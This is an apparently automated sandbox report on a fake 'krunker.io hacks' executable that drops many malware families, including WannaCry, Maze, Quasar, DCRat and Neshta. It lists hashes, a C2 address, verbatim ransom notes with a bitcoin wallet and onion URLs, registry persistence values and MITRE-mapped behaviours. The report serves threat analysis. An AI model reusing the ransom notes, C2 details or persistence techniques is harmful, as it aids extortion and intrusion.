dcrat | 892f11af94dea87bc8a85acdb092c74541b0ab63c8fcc1823ba7987c82c6e9ba

Resubmissions

02-09-2024 06:59

240902-hsk4hawbnd 10

02-09-2024 06:58

240902-hrpqaswbmb 10

02-09-2024 02:33

240902-c16ghszgkh 10

16-04-2024 14:39

240416-r1ca1ace39 10

Analysis

max time kernel
1167s
max time network
1209s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
10-04-2024 08:41

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

krunker.iohacks.exe
Size

30.9MB
MD5

2850f1cb75953d9e0232344f6a13bf48
SHA1

141ab8929fbe01031ab1e559d880440ae931cc16
SHA256

892f11af94dea87bc8a85acdb092c74541b0ab63c8fcc1823ba7987c82c6e9ba
SHA512

25551eb0fbca013bcebd514eb72185e157a07f116a6973bfe4b728febcefc7044a816c5c70048c3fda2eeb4ce53b52bd7b19ef1ef851a0f4fc90451e60540d6d
SSDEEP

786432:j8Zic+QKJObt2u8xQYcLpoTEjoAsM0D0EHShV/:j8YQzB8xQzLp+nAV0BK

Malware Config

Extracted

Path

C:\Users\Admin\Documents\@[email protected]

Family

wannacry

Ransom Note

Q: What's wrong with my files? A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted. If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely! Let's start decrypting! Q: What do I do? A: First, you need to pay service fees for the decryption. Please send $300 worth of bitcoin to this bitcoin address: 13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94 Next, please find an application file named "@[email protected]". It is the decrypt software. Run and follow the instructions! (You may need to disable your antivirus for a while.) Q: How can I trust? A: Don't worry about decryption. We will decrypt your files surely because nobody will trust us if we cheat users. * If you need our assistance, send a message by clicking <Contact Us> on the decryptor window. �

Wallets

13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94

Extracted

Family

quasar

Version

1.4.1

Botnet

Office04

45.88.186.209:4782

Mutex

e70efcae-9ec5-4682-aa19-15651d4d8cc8

Attributes

encryption_key
4EF1547B5DB5058DCCEB6A60D48A54C35026D8D5
install_name
gfhgfgjgf.exe
log_directory
dfdfsf
reconnect_delay
3000
startup_key
hgfhjjhgj
subdirectory
ghghghfg

Extracted

Path

C:\$Recycle.Bin\DECRYPT-FILES.txt

Family

maze

Ransom Note

Attention! ---------------------------- | What happened? ---------------------------- We hacked your network and now all your files, documents, photos, databases, and other important data are safely encrypted with reliable algorithms. You cannot access the files right now. But do not worry. You can get it back! It is easy to recover in a few steps. We have also downloaded a lot of private data from your network, so in case of not contacting us as soon as possible this data will be released. If you do not contact us in a 3 days we will post information about your breach on our public news website and after 7 days the whole downloaded info. To see what happens to those who don't contact us, google: * Southwire Maze Ransomware * MDLab Maze Ransomware * City of Pensacola Maze Ransomware After the payment the data will be removed from our disks and decryptor will be given to you, so you can restore all your files. ---------------------------- | How to contact us and get my files back? ---------------------------- The only method to restore your files and be safe from data leakage is to purchase a unique for you private key which is securely stored on our servers. To contact us and purchase the key you have to visit our website in a hidden TOR network. There are general 2 ways to reach us: 1) [Recommended] Using hidden TOR network. a) Download a special TOR browser: https://www.torproject.org/ b) Install the TOR Browser. c) Open the TOR Browser. d) Open our website in the TOR browser: http://aoacugmutagkwctu.onion/6c2d0cc345af21bb e) Follow the instructions on this page. 2) If you have any problems connecting or using TOR network a) Open our website: https://mazedecrypt.top/6c2d0cc345af21bb b) Follow the instructions on this page. Warning: the second (2) method can be blocked in some countries. That is why the first (1) method is recommended to use. On this page, you will see instructions on how to make a free decryption test and how to pay. Also it has a live chat with our operators and support team. ---------------------------- | What about guarantees? ---------------------------- We understand your stress and worry. So you have a FREE opportunity to test a service by instantly decrypting for free three files from every system in your network. If you have any problems our friendly support team is always here to assist you in a live chat! P.S. Dear system administrators, do not think you can handle it by yourself. Inform leadership as soon as possible. By hiding the fact of the breach you will be eventually fired and sometimes even sued. ------------------------------------------------------------------------------- THIS IS A SPECIAL BLOCK WITH A PERSONAL AND CONFIDENTIAL INFORMATION! DO NOT TOUCH IT WE NEED IT TO IDENTIFY AND AUTHORIZE YOU ---BEGIN MAZE KEY--- V6kV1p3mglTgw6xILE8+wbc4H3DDkrR2y4jl19puWskaPkqCIDuEFNu9/Ck8KXfPJmM6hxu/kKzdBQI3OGw9uyNBhrQqSlxlfl+ubULKXlapkokLOZew/vgKU4HMKGcwk7bRu79UIhMnljF2vAsxuLwd/VQS1lQDbuRkFPeqXTQ+N/elkVx8F0PEvdrjA9JMmwiHuTu6o5B1wlga3DjadS0BIw8z2Pey5nmhx5Fxo/tNpo/xTmuIzquRYzMPqxIj1LrtiDOOJ4Xdnro02n47TfC7V2oAyj4zzlYc1hslqT7UPWJ0kL+79XnebpXxTTanMQdQBOuQ4YkKl3ncN0CFO6tHWf2MrWHds8GA6aj6oVif8E3P3baClnY6TORmzCpddRupRkm2jh6go1hLXQH2+t0dfJ0DM+goWDQif6mgo/OQ7pwe7OBswY7ex/rnHZ2gT4JH7s0g6co2qeGnDbxHsDWQrtkv3ZFUQfycqHjK6tMeOZ8r5Y++29FVJ0FZvsLCiQynn8D4P96Gb1sfuiAU1ZEitTZ7g+WrtGx8lkX62kvHXEsjsXGQeGAyK82MgHehfDRXnwcsCTn14cu0DS2uWyF6THHAkNiTghpk1fX8eci756Ii1MvhtzX5YRQeHPklS+5CHIBnUPepn7+oOoBpIUf26sXcunEM71+IIXxC0zM9/RN1j3AA9pcEJUmHJv2MX3S/tEJWzCDDjSVHxr9W2eDZXNEzAjmijVGiWPR7IQ7tr2yQ5+LJCf6HwXlqH/SbOXzuxOD/MbZq9NqUGSm3yRT6at8wwTcnOZR3iUHMgyPuo1L9dpPu3J2JWciy3FgjSrvjiPQ6Ui7wojzWaW7HQDVuBBixiUczNT1xUilqKod6PHUp696QveAEQL4sj8I2EVfRegTsXmifElVPNnik9YyvKtIJxYc0UB3WMrdeJhgFSN5NV5aS2BfZbIZp6qQmJMXJbgj5AYzwSuwibFjq6X592KJFrhFV0YVopMirGrd8xHcim550G0ODGZoB2L8Oxl6ltU/ecS/68je2gvvRZJwCpu6ujxZYHt22u32iGgNIqIvR8Bspn0uK+/V5ImD83+bodD2DXHW+xgVxCdn6V5RIzUK+KpZ+8yOJn+reZSY0BbYOcmnegIKF+maoF0cvzSMqXoRWy2H35iAgevLesuI1C07h6mcQIactr+3HVNsLtkcry62kAGQqOQO2wH8NIL+HordxPp8HpX1iPyrmJ2wZiYIPLmnZQEPpb0m/myZMu37lNiQ/4GMPu2zLsKLz/7ZNUW5W9YIVu+MVB8vOQuVr+0CuzrD5em5CVBWLQbf767U7HlwcpoENwhaQzwMSmVM9kjLXNWR6yKz0wXEzu0sqjKDOosTGRSMqnik27bHQHgaWeV6vpztzXatjTXQkPjFJSCBdOFI3DTjKunCPtjxs7vD/dnDOSg//P6QHnU5VMWoFknbUHyc4AX8E3mArEgCha1rdtuTF6nqMgVrqctXIM8pd1wsv1sb7YKOGqENAO4srgSCmh3FMK9UXeqnIeytw9292fYEMHMjnqy2/Mo+7YwhgaTVnomO3Kq6JzIUOZ51rJ4Rxdj41DPoDVIm/0h06PNoSbqdnC+Xfz7My/pA90Q0l+fXKXKCwC2P7ZDM0oEHhoanuV+oBCMsxJGEzlRk87OBtcB1yhxK4LYjBhhSCuglZuij2k1ETKb2u883c3cEEp4W+BFgb+lJURynuvtQygaoT6c3EaECGhLpz2KIBp2VOQlnXysjPN+/jKc8GgrOilK1OWqmIl/kQL4UTpF8eX1A5XrXo+Akh0EhWDSK6rNwcq1Doydc/PVsIYvr46PS3BpmHOqAddU1h9oDDBL5xK8f2qTttGZi1odSjhOyisnIb5p/lgzUS/X0dFrpikzA0ER6FahfAkDCyIsVUYAULudntX6OJp6DK2t1G+Baatu0eUrhIh69uI8Vq/gzUgfDjcFENovuJD5Y4naCpRjQNT1gNnC0AVUZ/SUJImLkaxRSAFpcTHUtIV1WaoSBmzPjC+CHXVceyMuoVOYCX0gVGdh2O31AF68RHYzbDfWxE62vTkjnKOEFSXRGxa5HLbuENrT3GnruonqPy9TcUVMEE2qhBnmvkxIAAAuW5KmSq1sysF0GKjZapSRFTh0oQ5cnkiCVguaGTzw1LG0RlJdnxs9V2SvAwkYoUAp4rPxy1kciaKXGDjLQ9Se/vquy1ni/c4ruinJeK8SRpCcKTLmGdMQoiNgBjADIAZAAwAGMAYwAzADQANQBhAGYAMgAxAGIAYgAAABCAYBoMQQBkAG0AaQBuAAAAIiZXAE8AUgBLAEcAUgBPAFUAUABcAEEAWQBGAEwAWQBWAE0ASwAAACoMbgBvAG4AZQB8AAAAMiZXAGkAbgBkAG8AdwBzACAANwAgAFUAbAB0AGkAbQBhAHQAZQAAADoofABkAGUAcAByAGUAYwBhAHQAZQBkACAAPgAgAHYAMgAuADMAfAAAAEJWfABDAF8ARgBfADEAOAA2ADgANwAvADIANAAxADMANgAxAHwARABfAFUAXwAwAC8AMAB8AEYAXwBGAF8AMgAwADMAOAA4AC8AMgAwADQANwA5AHwAAABIAFBAWIkIYIkIaIkIcPac43t4DIABAYoBBTIuMy4x ---END MAZE KEY---

URLs

http://aoacugmutagkwctu.onion/6c2d0cc345af21bb

https://mazedecrypt.top/6c2d0cc345af21bb

Signatures

DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat

Detect Neshta payload 8 IoCs

Processes:

resource	yara_rule
behavioral1/files/0x0007000000015c4b-35.dat	family_neshta
behavioral1/files/0x00060000000104b6-68.dat	family_neshta
behavioral1/memory/2708-210-0x0000000000400000-0x000000000041B000-memory.dmp	family_neshta
behavioral1/memory/2708-575-0x0000000000400000-0x000000000041B000-memory.dmp	family_neshta
behavioral1/memory/2708-601-0x0000000000400000-0x000000000041B000-memory.dmp	family_neshta
behavioral1/memory/1924-962-0x0000000000400000-0x000000000041B000-memory.dmp	family_neshta
behavioral1/memory/1420-1108-0x0000000000400000-0x000000000041B000-memory.dmp	family_neshta
behavioral1/memory/1424-1111-0x0000000000400000-0x000000000041B000-memory.dmp	family_neshta

Maze
Ransomware family also known as ChaCha.
trojan ransomware maze
Neshta
Malware from the neshta family is designed to infect itself into other files to spread itself and cause damage.
persistence spyware neshta

Process spawned unexpected child process 5 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2344	3164	schtasks.exe	152
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2832	3164	schtasks.exe	152
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2096	3164	schtasks.exe	152
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2560	3164	schtasks.exe	152
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3652	3164	schtasks.exe	152

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar

Quasar payload 1 IoCs

Processes:

resource	yara_rule
behavioral1/memory/3016-2375-0x0000000000170000-0x0000000000494000-memory.dmp	family_quasar

Ramnit
Ramnit is a versatile family that holds viruses, worms, and Trojans.
trojan spyware stealer worm banker ramnit
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline
Troldesh, Shade, Encoder.858
Troldesh is a ransomware spread by malspam.
ransomware trojan troldesh
Wannacry
WannaCry is a ransomware cryptoworm.
ransomware worm wannacry

DCRat payload 1 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

Processes:

resource	yara_rule
behavioral1/files/0x0002000000024a78-9416.dat	dcrat

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

Processes:

random.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	random.exe

NirSoft MailPassView 1 IoCs

Password recovery tool for various email clients

Processes:

resource	yara_rule
behavioral1/files/0x0002000000024bfc-10296.dat	MailPassView

NirSoft WebBrowserPassView 1 IoCs

Password recovery tool for various web browsers

Processes:

resource	yara_rule
behavioral1/files/0x0002000000024bfc-10296.dat	WebBrowserPassView

Nirsoft 1 IoCs

Processes:

resource	yara_rule
behavioral1/files/0x0002000000024bfc-10296.dat	Nirsoft

Blocklisted process makes network request 6 IoCs

Processes:

mshta.exe

flow	pid	Process
2228	1588	mshta.exe
2235	1588	mshta.exe
2237	1588	mshta.exe
2239	1588	mshta.exe
2243	1588	mshta.exe
2245	1588	mshta.exe

Contacts a large (1462) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Creates new service(s) 1 TTPs
persistence

Windows Service
T1543.003
Downloads MZ/PE file

Modifies Windows Firewall 2 TTPs 3 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

Processes:

netsh.exenetsh.exenetsh.exe

pid	Process
2008	netsh.exe
2940	netsh.exe
1720	netsh.exe

Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

random.exe

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	random.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	random.exe

Drops startup file 1 IoCs

Processes:

[email protected]

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SDF531.tmp	[email protected]

Executes dropped EXE 45 IoCs

Processes:

4363463463464363463463463.exebot.exe[email protected][email protected]bot.exe[email protected]RIP_YOUR_PC_LOL.exeska2pwej.aeh.exe1.exex2s443bc.cs1.exeska2pwej.aeh.tmpx2s443bc.cs1.tmptaskdl.exesvchost.comsvchost.comTEMPEX~1.EXETEMPSP~1.EXETEMPEX~1Srv.exeTEMPEX~1SrvSrv.exeDesktopLayer.exeDesktopLayerSrv.exesvchost.comsvchost.com10.exesvchost.comGHHJHJ~1.EXE@[email protected]@[email protected]svchost.comsvchost.comrandom.exetaskdl.exetaskse.exe@[email protected]svchost.comsvchost.com555.exesvchost.comtaskdl.exeghjkl.exeEQNEDT32.EXEtaskse.exe@[email protected]svchost.comEQNEDT32.EXE

pid	Process
2680	4363463463464363463463463.exe
2708	bot.exe
2452	[email protected]
2676	[email protected]
2468	bot.exe
2428	[email protected]
2944	RIP_YOUR_PC_LOL.exe
2524	ska2pwej.aeh.exe
2788	1.exe
1364	x2s443bc.cs1.exe
860	ska2pwej.aeh.tmp
1664	x2s443bc.cs1.tmp
2032	taskdl.exe
1924	svchost.com
2572	svchost.com
1804	TEMPEX~1.EXE
2268	TEMPSP~1.EXE
2088	TEMPEX~1Srv.exe
2352	TEMPEX~1SrvSrv.exe
2472	DesktopLayer.exe
1128	DesktopLayerSrv.exe
1420	svchost.com
1424	svchost.com
616	10.exe
2000	svchost.com
3016	GHHJHJ~1.EXE
1088	@[email protected]
2848	@[email protected]
2232	svchost.com
2084	svchost.com
2364	random.exe
520	taskdl.exe
2732	taskse.exe
292	@[email protected]
2452	svchost.com
2948	svchost.com
2828	555.exe
1804	svchost.com
3988	taskdl.exe
3040	ghjkl.exe
512	EQNEDT32.EXE
4068	taskse.exe
4040	@[email protected]
840	svchost.com
1476	EQNEDT32.EXE

Identifies Wine through registry keys 2 TTPs 1 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

Processes:

random.exe

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000\Software\Wine	random.exe

Loads dropped DLL 64 IoCs

Processes:

cmd.exebot.exeRIP_YOUR_PC_LOL.exeska2pwej.aeh.exex2s443bc.cs1.exe[email protected]cscript.exesvchost.comsvchost.comTEMPEX~1.EXETEMPEX~1Srv.exeDesktopLayer.exesvchost.comsvchost.com[email protected]cmd.exesvchost.comsvchost.com

pid	Process
2700	cmd.exe
2700	cmd.exe
2700	cmd.exe
2700	cmd.exe
2700	cmd.exe
2700	cmd.exe
2700	cmd.exe
2700	cmd.exe
2708	bot.exe
2700	cmd.exe
2700	cmd.exe
2700	cmd.exe
2944	RIP_YOUR_PC_LOL.exe
2944	RIP_YOUR_PC_LOL.exe
2700	cmd.exe
2524	ska2pwej.aeh.exe
1364	x2s443bc.cs1.exe
2428	[email protected]
2428	[email protected]
2604	cscript.exe
2708	bot.exe
1924	svchost.com
1924	svchost.com
2572	svchost.com
2572	svchost.com
2572	svchost.com
1804	TEMPEX~1.EXE
2088	TEMPEX~1Srv.exe
2088	TEMPEX~1Srv.exe
2472	DesktopLayer.exe
1420	svchost.com
2708	bot.exe
2708	bot.exe
2944	RIP_YOUR_PC_LOL.exe
2572	svchost.com
2572	svchost.com
2000	svchost.com
2000	svchost.com
2452	[email protected]
2428	[email protected]
2428	[email protected]
2180	cmd.exe
2180	cmd.exe
2084	svchost.com
2084	svchost.com
2428	[email protected]
2428	[email protected]
2428	[email protected]
2428	[email protected]
2428	[email protected]
2428	[email protected]
2452	svchost.com
2452	svchost.com
2572	svchost.com
2572	svchost.com
2572	svchost.com
2572	svchost.com
2572	svchost.com
2572	svchost.com
2572	svchost.com
2572	svchost.com
2572	svchost.com
2572	svchost.com
2572	svchost.com

Modifies file permissions 1 TTPs 2 IoCs

discovery

File and Directory Permissions Modification

T1222

Processes:

icacls.exeicacls.exe

pid	Process
1568	icacls.exe
1840	icacls.exe

Modifies system executable filetype association 2 TTPs 1 IoCs

persistence

Modify Registry

T1112

Change Default File Association

T1546.001

Processes:

bot.exe

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*"	bot.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 16 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral1/memory/2676-75-0x0000000000400000-0x00000000005DE000-memory.dmp	upx
behavioral1/memory/2676-109-0x0000000000400000-0x00000000005DE000-memory.dmp	upx
behavioral1/memory/2676-127-0x0000000000400000-0x00000000005DE000-memory.dmp	upx
behavioral1/memory/2676-123-0x0000000000400000-0x00000000005DE000-memory.dmp	upx
behavioral1/memory/2676-576-0x0000000000400000-0x00000000005DE000-memory.dmp	upx
behavioral1/memory/2088-847-0x0000000000400000-0x000000000043D000-memory.dmp	upx
behavioral1/memory/2268-854-0x0000000000400000-0x0000000000416000-memory.dmp	upx
behavioral1/memory/2088-950-0x0000000000400000-0x000000000043D000-memory.dmp	upx
behavioral1/memory/2352-951-0x0000000000400000-0x000000000042E000-memory.dmp	upx
behavioral1/memory/2352-973-0x0000000000400000-0x000000000042E000-memory.dmp	upx
behavioral1/memory/2472-998-0x0000000000400000-0x000000000043D000-memory.dmp	upx
behavioral1/memory/1128-1015-0x0000000000400000-0x000000000042E000-memory.dmp	upx
behavioral1/files/0x000500000001c901-992.dat	upx
behavioral1/files/0x000600000001c8f7-963.dat	upx
behavioral1/memory/1420-1016-0x0000000000220000-0x000000000024F000-memory.dmp	upx
behavioral1/memory/2268-1110-0x0000000000400000-0x0000000000416000-memory.dmp	upx

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

[email protected]bot.exereg.exe

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000\Software\Microsoft\Windows\CurrentVersion\Run\Client Server Runtime Subsystem = "\"C:\\ProgramData\\Windows\\csrss.exe\""	[email protected]
Set value (str)	\REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000\Software\Microsoft\Windows\CurrentVersion\Run\ Ransomware = "C:\\Users\\Admin\\AppData\\Local\\Temp\\3582-490\\bot.exe"	bot.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\zuhdaaixrury513 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\RarSFX0\\tasksche.exe\""	reg.exe

Enumerates connected drives 3 TTPs 23 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

[email protected]

description	ioc	Process
File opened (read-only)	\??\e:	[email protected]
File opened (read-only)	\??\g:	[email protected]
File opened (read-only)	\??\j:	[email protected]
File opened (read-only)	\??\t:	[email protected]
File opened (read-only)	\??\x:	[email protected]
File opened (read-only)	\??\w:	[email protected]
File opened (read-only)	\??\i:	[email protected]
File opened (read-only)	\??\k:	[email protected]
File opened (read-only)	\??\l:	[email protected]
File opened (read-only)	\??\r:	[email protected]
File opened (read-only)	\??\s:	[email protected]
File opened (read-only)	\??\u:	[email protected]
File opened (read-only)	\??\a:	[email protected]
File opened (read-only)	\??\h:	[email protected]
File opened (read-only)	\??\m:	[email protected]
File opened (read-only)	\??\o:	[email protected]
File opened (read-only)	\??\q:	[email protected]
File opened (read-only)	\??\y:	[email protected]
File opened (read-only)	\??\b:	[email protected]
File opened (read-only)	\??\n:	[email protected]
File opened (read-only)	\??\p:	[email protected]
File opened (read-only)	\??\v:	[email protected]
File opened (read-only)	\??\z:	[email protected]

Legitimate hosting services abused for malware hosting/C2 1 TTPs 8 IoCs

Web Service

T1102

Processes:

flow	ioc
2247	bitbucket.org
2248	bitbucket.org
2301	raw.githubusercontent.com
2302	raw.githubusercontent.com
2563	raw.githubusercontent.com
11	iplogger.org
13	iplogger.org
14	iplogger.org

Looks up external IP address via web service 4 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow	ioc
2265	whatismyipaddress.com
2268	whatismyipaddress.com
2272	whatismyipaddress.com
2387	ip-api.com

Drops autorun.inf file 1 TTPs 4 IoCs

Malware can abuse Windows Autorun to spread further via attached volumes.

Replication Through Removable Media

T1091

Processes:

bot.exe

description	ioc	Process
File created	C:\autorun.inf	bot.exe
File opened for modification	C:\autorun.inf	bot.exe
File created	F:\autorun.inf	bot.exe
File opened for modification	F:\autorun.inf	bot.exe

Drops file in System32 directory 38 IoCs

Processes:

[email protected]

description	ioc	Process
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\microsoft sql server	[email protected]
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\office	[email protected]
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\onenote	[email protected]
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\outlook	[email protected]
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\powerpoint	[email protected]
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\word	[email protected]
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\local\outlook	[email protected]
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\thunderbird	[email protected]
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\local\thunderbird	[email protected]
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\local\bitcoin	[email protected]
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft sql server	[email protected]
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\powerpoint	[email protected]
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\local\powerpoint	[email protected]
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\the bat!	[email protected]
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\steam	[email protected]
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\local\steam	[email protected]
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\local\word	[email protected]
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\microsoft sql server	[email protected]
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\outlook	[email protected]
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\local\office	[email protected]
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\local\onenote	[email protected]
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\powerpoint	[email protected]
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\excel	[email protected]
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\documents	[email protected]
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\excel	[email protected]
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\excel	[email protected]
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\word	[email protected]
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\word	[email protected]
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\desktop	[email protected]
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\local\the bat!	[email protected]
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\bitcoin	[email protected]
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\local\excel	[email protected]
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\office	[email protected]
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\onenote	[email protected]
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\office	[email protected]
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft sql server	[email protected]
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\onenote	[email protected]
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\outlook	[email protected]

Sets desktop wallpaper using registry 2 TTPs 3 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

Processes:

[email protected][email protected]@[email protected]

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\tmpEE93.bmp"	[email protected]
Set value (str)	\REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]"	[email protected]
Set value (str)	\REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]"	@[email protected]

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

Processes:

random.exe

pid	Process
2364	random.exe

Drops file in Program Files directory 64 IoCs

Processes:

wscript.exebot.exesvchost.com

description	ioc	Process
File created	C:\Program Files\Common Files\Microsoft Shared\ink\ja-JP\tabskb.dll.mui.Cyborg Builder Ransomware	wscript.exe
File created	C:\Program Files\Common Files\System\Ole DB\msdaosp.dll.Cyborg Builder Ransomware	wscript.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\navSubpicture.png.Cyborg Builder Ransomware	wscript.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\cmm\CIEXYZ.pf.Cyborg Builder Ransomware	wscript.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Nicosia.Cyborg Builder Ransomware	wscript.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Fakaofo.Cyborg Builder Ransomware	wscript.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\btn-next-static.png.Cyborg Builder Ransomware	wscript.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Notes_LOOP_BG_PAL.wmv.Cyborg Builder Ransomware	wscript.exe
File created	C:\Program Files\Google\Chrome\Application\106.0.5249.119\default_apps\external_extensions.json.Cyborg Builder Ransomware	wscript.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Kentucky.Cyborg Builder Ransomware	wscript.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\META-INF\MANIFEST.MF.Cyborg Builder Ransomware	wscript.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\HueCycle\NavigationLeft_SelectionSubpicture.png.Cyborg Builder Ransomware	wscript.exe
File created	C:\Program Files\Internet Explorer\DiagnosticsHub.DataWarehouse.dll.Cyborg Builder Ransomware	wscript.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\bin\java-rmi.exe.Cyborg Builder Ransomware	wscript.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\bin\msvcr100.dll.Cyborg Builder Ransomware	wscript.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Ceuta.Cyborg Builder Ransomware	wscript.exe
